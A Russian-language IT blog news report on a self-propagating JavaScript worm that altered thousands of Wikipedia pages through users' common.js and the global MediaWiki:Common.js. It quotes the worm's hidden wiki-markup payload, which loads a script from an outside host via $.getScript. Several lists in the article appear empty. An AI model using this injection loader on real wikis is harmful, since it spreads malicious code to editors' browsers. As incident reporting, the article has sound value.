Site icon IT-блог о Linux, DevOps и серверных технологиях
Пятница, 6 марта, 2026

Википедию атаковал самораспространяющийся JavaScript-червь: тысячи страниц были изменены

Википедию атаковал самораспространяющийся JavaScript-червь: тысячи страниц были изменены

Один из крупнейших интернет-проектов — Wikipedia — столкнулся с серьезным инцидентом безопасности. Самораспространяющийся JavaScript-червь начал автоматически изменять страницы и внедрять вредоносный код в пользовательские скрипты редакторов.

Атака затронула тысячи страниц и десятки учетных записей, что заставило инженеров временно ограничить редактирование на ряде проектов, чтобы остановить распространение вредоносного кода.

Этот инцидент вновь поднимает вопрос безопасности крупных открытых платформ и показывает, как даже небольшая уязвимость может привести к масштабным последствиям.

 

Что произошло

По данным специалистов, инцидент начался после выполнения вредоносного JavaScript-скрипта, размещенного на одной из страниц проекта. Скрипт был связан с файлом test.js, загруженным на один из аккаунтов ещё в 2024 году.

Когда скрипт был выполнен в браузере авторизованного редактора, он начал распространяться автоматически:

 

Такая схема позволяла червю быстро заражать новые профили и автоматически повторять атаку.

 

Как работал JavaScript-червь

Главная особенность атаки — самораспространение через пользовательские скрипты MediaWiki.

Википедия позволяет редакторам использовать JavaScript-файлы для настройки интерфейса. Например:

 

После запуска вредоносного файла происходили следующие действия:

  1. Скрипт добавлял загрузчик вредоносного JavaScript в common.js пользователя.
  2. Если у редактора были повышенные права — он пытался изменить глобальный скрипт сайта.
  3. Новый код автоматически запускался у других редакторов.
  4. Процесс повторялся, создавая цепную реакцию.

 

Таким образом заражение происходило прямо через браузеры пользователей.

Код для внедрения самораспространяющегося JavaScript-червя в скрипт MediaWiki:Common.js

 

Масштаб атаки

По предварительным данным расследования:

 

Некоторые страницы также получили скрытые элементы, загружавшие внешние скрипты с подозрительных сайтов.

 

Скрипт также позволяет редактировать случайную страницу, запрашивая ее с помощью вики-команды Special:Random, а затем редактируя страницу, чтобы вставить изображение и следующий за ним скрытый загрузчик JavaScript.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>

 

Как выглядело вредоносное изменение страниц

Червь использовал простой, но эффективный метод:

 

Этот код автоматически загружал внешний скрипт при открытии страницы редактором, что позволяло продолжать распространение вредоносного кода.

Пользователь Wikimedia заразил скрипт common.js

 

Реакция разработчиков Wikimedia

После обнаружения проблемы инженеры Wikimedia Foundation приняли экстренные меры:

 

Кроме того, изменённые страницы были скрыты из истории правок, чтобы предотвратить повторное распространение скрипта.

На момент публикации атака была остановлена, однако подробный технический отчёт пока не опубликован.

 

Почему эта атака опасна

Этот инцидент показывает одну из ключевых проблем веб-платформ — доверие к пользовательскому JavaScript.

Основные риски подобных атак:

 

Самораспространяющиеся скрипты могут распространяться гораздо быстрее обычного вредоносного кода, поскольку используют инфраструктуру самой платформы.

Страницы, измененные червем JavaScript

 

Что нового в этой истории

 

Выводы

Атака на Wikipedia демонстрирует, насколько сложной стала безопасность крупных открытых платформ. Даже относительно простой JavaScript-скрипт может превратиться в мощный инструмент распространения вредоносного кода, если он получает доступ к глобальным настройкам системы.

Для предотвращения подобных инцидентов платформам необходимо:

 

Этот случай также напоминает, что даже крупнейшие интернет-проекты не застрахованы от неожиданных уязвимостей.

 

FAQ

Что такое JavaScript-червь?

Это разновидность вредоносного кода, который распространяется автоматически, копируя себя в другие скрипты или системы.

Почему атака распространилась так быстро?

Червь использовал пользовательские и глобальные JavaScript-файлы MediaWiki, которые выполняются в браузерах редакторов.

Были ли скомпрометированы данные пользователей?

На момент расследования информации о краже данных нет — атака в основном была направлена на изменение страниц.

Сколько страниц пострадало?

По предварительным данным, вредоносные изменения затронули около 3996 страниц.

Работает ли Wikipedia сейчас нормально?

Да, разработчики удалили вредоносный код и восстановили заражённые скрипты, после чего редактирование снова стало доступным.

Exit mobile version